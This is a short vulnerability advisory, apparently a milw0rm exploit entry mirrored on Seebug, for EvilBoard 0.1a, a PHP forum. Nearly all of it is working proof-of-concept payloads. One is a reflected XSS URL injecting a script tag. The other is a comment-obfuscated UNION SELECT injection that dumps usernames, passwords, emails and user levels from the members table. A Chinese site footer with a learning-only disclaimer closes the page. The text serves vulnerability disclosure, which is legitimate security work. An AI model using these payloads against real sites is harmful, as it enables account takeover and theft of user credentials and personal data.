##################################################################### ## ## Title: EvilBoard 0.1a (Alpha) Multiple Remote Vulnerabilities ## Author: seaofglass, <seaofglass[at]korea.com> ## Download: http://sourceforge.net/projects/evilboard ## Bug: XSS & Remote Sql Injection ## Info: EvilBoard is using PHP and mysql. ## MySite: http://seaofglass.backrush.com ## ##################################################################### # bug 1 : XSS # PoC http://host/EvilBoard_0.1a/index.php?c='><script>alert('hi');</script> # bug 2 : Remote SQL Injection # PoC http://host/EvilBoard_0.1a/index.php?c='/**/union/**/select/**/1,concat(username,char(77),password,char(77),email_address,char(77),info,char(77),user_level,char(77))/**/from/**/eb_members/**/where/**/userid=1/* # thanks vangelis, AmesianX # milw0rm.com [2008-01-08]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论